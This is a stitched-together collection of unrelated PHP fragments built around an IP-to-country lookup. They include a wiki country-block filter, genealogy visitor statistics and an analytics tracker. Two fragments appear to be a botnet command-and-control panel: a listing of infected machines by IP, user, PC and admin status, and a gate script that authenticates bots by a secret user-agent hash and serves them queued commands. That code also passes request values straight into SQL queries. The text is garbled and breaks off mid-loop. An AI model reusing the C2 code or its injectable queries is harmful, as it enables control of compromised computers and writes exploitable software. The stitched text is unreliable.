// preview? if (isset($_POST["submit"]) && $_POST["submit"] == "Sauver") { if (!function_exists('iptocountry')) { function iptocountry($ip) { $numbers = preg_split("/\\./", $ip); include "tools/ipblock/ip_files/" . $numbers[0] . ".php"; $code = $numbers[0] * 16777216 + $numbers[1] * 65536 + $numbers[2] * 256 + $numbers[3]; foreach ($ranges as $key => $value) { if ($key <= $code) { if ($ranges[$key][0] >= $code) { $country = $ranges[$key][1]; break; } } } if ($country == "") { $country = "unknown"; } return $country; } } // Filtrage IP $visitorIP = $_SERVER["REMOTE_ADDR"]; $two_letter_country_code = iptocountry($visitorIP); if (in_array($two_letter_country_code, $pays_bloque)) { $this->SetMessage("Vous ne pouvez pas modifier le contenu de ce Wiki depuis ce poste de travail"); $this->Redirect($this->href()); } } }
<input type="text" id="ammount" name="ammount" class="tb" style="width: 150px; text-align: center"/> <br><br> <table> <tr> <th style="width: 50px; text-align: center;" class="th">ID</th> <th class="th" style="text-align: center;">Country</th> <th class="th" style="text-align: center;">IP</th> <th class="th" style="text-align: center;">User@PC</th> <th class="th" style="text-align: center;">Admin</th> <th class="th" style="text-align: center;">Status</th> <th class="th" style="text-align: center;">Select</th> </tr>'; while ($row = mysql_fetch_array($query_1)) { $count = $count++; $IPaddress = $row['ip']; $two_letter_country_code = iptocountry($IPaddress); $country_name = $countries[$two_letter_country_code][1]; // To display flag $cctolower = strtolower($two_letter_country_code); $flagname = "flags/" . $cctolower . ".gif"; $file_to_check = $flagname; $readable_date = date("j F Y, g:i a", $row['time']); echo '<tr> <td style="width: 50px; text-align: center;" class="td">#' . $row['id'] . '</td> <td class="td" style="text-align: center;">'; if (file_exists($file_to_check)) { print "<img src={$file_to_check}> {$country_name}<br>"; } else { print "<img src=flags/noflag.gif> {$country_name}<br>"; } echo '</td>
function country() { global $dbh, $language; // *** For test purposes *** $path = CMS_ROOTPATH_ADMIN . 'ip_files/'; // *** For test only *** //if (file_exists("../../humo-gen ip_files")){ $path='../../humo-gen ip_files/'; } $stat = $dbh->query("SELECT stat_ip_address FROM humo_stat_date GROUP BY stat_ip_address"); // Print out result while ($row = $stat->fetch()) { $country = iptocountry($row['stat_ip_address'], $path); if (isset($countries[$country])) { $countries[$country]++; } else { $countries[$country] = 1; } } echo '<table class="humo" border="1" cellspacing="0" width="100%">'; echo '<tr class="table_header"><th>' . __('Country of origin') . '</th> <th>' . __('Number of unique visitors') . '</th> </tr>'; if (isset($countries)) { arsort($countries); foreach ($countries as $key => $value) { include_once $path . "countries.php"; echo '<tr><td>'; //flag //$file_to_check="ip_files/flags/".$key.".gif"; $file_to_check = $path . "flags/" . $key . ".gif"; if (file_exists($file_to_check)) { print '<img src="' . $file_to_check . '" width="30" height="15">'; } else { print '<img src="' . $path . 'flags/noflag.gif" width=30 height=15>'; } echo " "; if ($key != __('Unknown')) { echo $countries[$key][1] . ' (' . $key . ')</td>'; } else { echo $key; } echo '<td>' . $value . '</td></tr>'; } } echo '<tr><td>' . __('Total number of unique visitors:') . '</td>'; $total = $stat->rowCount(); echo '<td>' . $total . '</td></tr>'; echo '</table>'; //echo "<br>"; }
<?php $IS_ON = true; $DEBUG = $_GET['debug'] == '1' ? true : false; if (!$IS_ON) { kill_script('5'); } include './paths.php'; $paths = new Paths(); $phpPath = $paths->getFullPath('php'); require_once $phpPath . "libs.php"; ini_set('display_errors', 0); header('Content-Type:text/javascript'); $countryCode = iptocountry($_SERVER["REMOTE_ADDR"]); $analytics_DBName = 'tsanalyticsdb'; $analytics_tableName = 'ts_analytics_data_01'; $analytics_username = '******'; $analytics_password = "******"; $analyticsPrefixString = 'ts_an_'; $analytics_fields = array("__update__", "winsize", "coords", "avg_conn", "reqid", "usrid", "referer", "screen", "time", "mouse", "clicks", "scroll", "keys", "events", "duration", "s_REMOTE_PORT", "s_REMOTE_HOST", "s_REMOTE_ADDR", "s_TIME", "s_REQUEST_METHOD", "s_URL", "s_SERVER_PORT", "s_COUNTRY", "s_UA"); $server_vars = array("s_REMOTE_PORT" => $_SERVER['REMOTE_PORT'], "s_REMOTE_HOST" => $_SERVER['REMOTE_HOST'], "s_REMOTE_ADDR" => $_SERVER['REMOTE_ADDR'], "s_URL" => $_SERVER['HTTP_REFERER'], "s_SERVER_PORT" => $_SERVER['SERVER_PORT'], "s_COUNTRY" => $countryCode, "s_UA" => $_SERVER['HTTP_USER_AGENT']); foreach ($server_vars as $key => $value) { $_GET[$analyticsPrefixString . $key] = $value; } foreach ($analytics_fields as $anKey => $anfield) { $analytics_fields[$anKey] = $analyticsPrefixString . $anfield; } $debug_array = array(); function debugLog($str) { global $DEBUG;
<?php $two_letter_country_code = iptocountry(""); function iptocountry($ip) { debugbreak(); $numbers = preg_split("/\\./", $ip); include "ip_files/" . $numbers[0] . ".php"; $code = $numbers[0] * 16777216 + $numbers[1] * 65536 + $numbers[2] * 256 + $numbers[3]; foreach ($ranges as $key => $value) { if ($key <= $code) { if ($ranges[$key][0] >= $code) { $country = $ranges[$key][1]; break; } } } if ($country == "") { $country = "unkown"; } return $country; }
function GetCountryCode($ip) { return strtolower(iptocountry($ip)); }
<?php function iptocountry($ip) { $numbers = preg_split("/\\./", $ip); include "/media/ip_files/" . $numbers[0] . ".php"; $code = $numbers[0] * 16777216 + $numbers[1] * 65536 + $numbers[2] * 256 + $numbers[3]; foreach ($ranges as $key => $value) { if ($key <= $code) { if ($ranges[$key][0] >= $code) { $country = $ranges[$key][1]; break; } } } if ($country == "") { $country = "unkown"; } return $country; } echo $two_letter_country_code = iptocountry($_SERVER['REMOTE_ADDR']);
<?php //recorded data is IP, Pure Epoch Time, Username@PC Name, Boolean of Administrator and Operating System require_once 'inc/config.php'; include 'inc/functions.php'; include "ip_files/countries.php"; $ip = cleanstring($_SERVER['REMOTE_ADDR']); $time = time(); $userandpc = cleanstring($_POST['userandpc']); $admin = cleanstring($_POST['admin']); $os = cleanstring($_POST['os']); $ownerid = cleanstring($_POST['ownerid']); $version = cleanstring($_POST['version']); $hwid = cleanstring($_POST['hwid']); $header = cleanstring($_SERVER['HTTP_USER_AGENT']); $cc = iptocountry($ip); // Check if its a Bot and not a User if ($header == "753cda8b05e32ef3b82e0ff947a4a936") { // Check if the bot exists if (isset($_POST['hwid'])) { $bottest = mysql_query("SELECT * FROM clients WHERE hwid LIKE '{$hwid}'"); while ($row = mysql_fetch_array($bottest)) { $id = $row['id']; } if (mysql_num_rows($bottest) == 1) { $result = mysql_query("SELECT * FROM commands WHERE botid LIKE '{$id}' AND viewed = '0' LIMIT 1"); mysql_query("UPDATE clients SET status='Online' WHERE id='{$id}'"); mysql_query("UPDATE clients SET time='{$time}' WHERE id='{$id}'"); mysql_query("UPDATE clients SET ip='{$ip}' WHERE id='{$id}'"); // Detected a returning bot thus checking for commands while ($row = mysql_fetch_array($result)) {